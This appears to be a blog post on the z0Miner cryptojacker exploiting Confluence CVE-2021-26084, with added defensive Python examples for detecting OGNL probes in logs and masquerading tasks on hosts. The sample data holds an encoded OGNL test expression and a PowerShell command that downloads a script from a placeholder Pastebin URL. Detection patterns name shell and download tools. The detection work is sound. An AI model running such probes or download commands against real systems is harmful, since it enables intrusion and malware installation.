Bobos & Wojaks


Cryptocurrency Miner Is Exploiting A New Bug

According to Trend Micro researchers, the bitcoin mining malware is currently targeting a recently disclosed Atlassian Confluence remote code execution (RCE) vulnerability, which was only made public in August of this year.

The major security hole, with a CVSS severity score of 9.8, is an Object-Graph Navigation Language (OGNL) injection vulnerability that can be abused to achieve RCE, and it is known to be exploited in the wild.
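OGNL injection is detectable at the web tier because the expression language has a recognisable syntax: `${...}` / `#{...}` delimiters and `@class@member` static references. The following added example (not code from the original post or from Trend Micro) scans constructed Confluence-style access-log lines for those generic markers after undoing percent-encoding and Java-style `\uXXXX` escapes. The log format, endpoint paths and IP addresses are assumptions made up for the example; the marker list is the OGNL language syntax itself, not any specific exploit.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in a Tomcat-style access-log format. These are
# made-up entries for the example, not real traffic or real indicators.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2021:10:12:01 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Sep/2021:10:12:05 +0000] "GET /dosearchsite.action?queryString=%24%7B1%2B1%7D HTTP/1.1" 200 310
203.0.113.9 - - [01/Sep/2021:10:12:06 +0000] "POST /pages/createpage.action?spaceKey=DOCS HTTP/1.1" 302 0
198.51.100.4 - - [01/Sep/2021:10:13:00 +0000] "GET /dosearchsite.action?queryString=price+%24100 HTTP/1.1" 200 8800
"""

# Generic OGNL expression markers. The delimiters and the "@class@member"
# static-reference form are part of the OGNL language, not one exploit.
OGNL_MARKERS = [
    re.compile(r"[$#]\{"),                 # expression delimiters ${ / #{
    re.compile(r"@[\w.]+@\w+"),            # static class/member reference
    re.compile(r"\.getClass\s*\(", re.I),  # reflection pivot commonly seen in probes
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def deep_unquote(value, rounds=3):
    """Percent-decode repeatedly to undo double/triple encoding, then resolve
    Java-style \\uXXXX escapes, which OGNL accepts inside string literals."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)


def find_ognl_indicators(log_text):
    """Return one record per query parameter whose decoded value contains
    an OGNL marker. A plain '$' (e.g. '$100') does not match."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl already percent-decodes once; deep_unquote handles the rest.
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = deep_unquote(raw)
            if any(p.search(value) for p in OGNL_MARKERS):
                hits.append({"ip": m.group("ip"), "path": parts.path,
                             "param": name, "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_ognl_indicators(SAMPLE_LOG):
        print(hit)
```

Run against a real log export, the output is a short list of source IPs and parameters to triage; the decode step matters because scanners routinely double-encode or `\u`-escape the braces to slip past naive string matches.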

Benny Jacob reported the issue through Atlassian’s bug bounty program.

This RCE, along with the Oracle WebLogic Server RCE (CVE-2020-14882), the Elasticsearch RCE (CVE-2015-1427), Jenkins, and other code execution issues in major server software, has been exploited by z0Miner, a Trojan and bitcoin mining bundle.

Once a vulnerable server has been found and the vulnerability has been used to obtain remote access, the malware deploys a set of webshells to install and execute malicious files, including a .dll file disguised as a Hyper-V integration service and a scheduled task that pretends to be a legitimate .NET Framework NGEN task.

The task attempts to download and run malicious scripts from a Pastebin repository, but that URL has already been taken down.

These early activities are designed to maintain persistence on the infected machine. In its second-stage payload deployment, z0Miner then searches for and deletes any rival cryptocurrency miners installed on the server before activating its own: a miner that consumes the server's computing resources to mine Monero (XMR).
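Every stage described above leaves host-side telemetry that a defender can test with simple rules: a scheduled task that borrows the NGEN name but runs from outside the .NET directory, a "Hyper-V" DLL loaded from a writable path, a download from a paste site, and a shell spawned by the web application process. The following is an added example (not code from the original post, Trend Micro, or any EDR product) that evaluates such rules over constructed Sysmon/EDR-style records. The event schema, host name, file paths and the Pastebin ID are made up; the example assumes that legitimate NGEN task actions live under C:\Windows\Microsoft.NET and that Hyper-V integration components live under System32, and that Confluence runs as java.exe.

```python
import re

# Constructed host telemetry records (simplified Sysmon/EDR shape). These are
# made-up events for the example, not real z0Miner indicators of compromise.
EVENTS = [
    # Legitimate NGEN task: name and action both match the real thing.
    {"type": "scheduled_task", "host": "conf01",
     "name": r"\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64",
     "action": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"},
    # Masquerading task: NGEN-style name, but the action runs from ProgramData.
    {"type": "scheduled_task", "host": "conf01",
     "name": r"\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Update",
     "action": r"C:\ProgramData\ngen\update.exe"},
    # Genuine Hyper-V integration component under System32.
    {"type": "image_load", "host": "conf01",
     "image": r"C:\Windows\System32\vmicsvc.exe",
     "loaded": r"C:\Windows\System32\icsvc.dll"},
    # Hyper-V-sounding DLL loaded from a user-writable directory.
    {"type": "image_load", "host": "conf01",
     "image": r"C:\ProgramData\ngen\update.exe",
     "loaded": r"C:\ProgramData\ngen\hypervintegration.dll"},
    # Shell spawned by the Confluence java process, fetching from a paste site.
    {"type": "process", "host": "conf01",
     "parent": r"C:\Confluence\jre\bin\java.exe",
     "cmdline": r'powershell.exe -c "Invoke-WebRequest https://pastebin.com/raw/PLACEHOLDER_ID -OutFile C:\ProgramData\ngen\s.ps1"'},
    # Ordinary interactive activity.
    {"type": "process", "host": "conf01",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\Users\admin\notes.txt"},
]

# Directories where the impersonated Windows components legitimately live
# (assumption for this example; adjust to the environment's baseline).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\microsoft.net\\")

NGEN_RE = re.compile(r"ngen|\.net framework", re.I)
HYPERV_RE = re.compile(r"hyper-?v|vmic|icsvc", re.I)
PASTE_RE = re.compile(r"pastebin\.com", re.I)
WEB_PARENT_RE = re.compile(r"\\(java|javaw|tomcat\d*|w3wp)\.exe$", re.I)
SHELL_RE = re.compile(
    r'^\s*"?(cmd|powershell|pwsh|schtasks|taskkill|certutil|bitsadmin)(\.exe)?\b', re.I)


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def evaluate(event):
    """Return the list of rule names the event trips (empty if benign)."""
    fired = []
    t = event["type"]
    if t == "scheduled_task" and NGEN_RE.search(event["name"]) \
            and not in_system_dir(event["action"]):
        fired.append("ngen_task_masquerade")
    if t == "image_load" and HYPERV_RE.search(event["loaded"]) \
            and not in_system_dir(event["loaded"]):
        fired.append("hyperv_dll_masquerade")
    if t == "process":
        if PASTE_RE.search(event["cmdline"]):
            fired.append("paste_site_download")
        if WEB_PARENT_RE.search(event["parent"]) and SHELL_RE.match(event["cmdline"]):
            fired.append("webapp_spawned_shell")
    return fired


def triage(events):
    """Keep only events that trip at least one rule, as (host, type, rules)."""
    return [(e["host"], e["type"], rules) for e in events if (rules := evaluate(e))]


if __name__ == "__main__":
    for host, kind, rules in triage(EVENTS):
        print(host, kind, ", ".join(rules))
```

The name-versus-path mismatch is the durable signal here: the task and DLL names can be anything, but a real NGEN task or Hyper-V component does not execute from ProgramData, and the Confluence service account has no business launching PowerShell at all.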

A patch has been released to address CVE-2021-26084, and because threat actors will always seek to exploit new bugs for their own purposes, the Microsoft Exchange Server attacks being a prime example, IT administrators should apply the new security fixes to vulnerable systems as soon as possible.

The z0Miner cryptojacker is now weaponizing a new Confluence vulnerability to mine for cryptocurrency on vulnerable machines.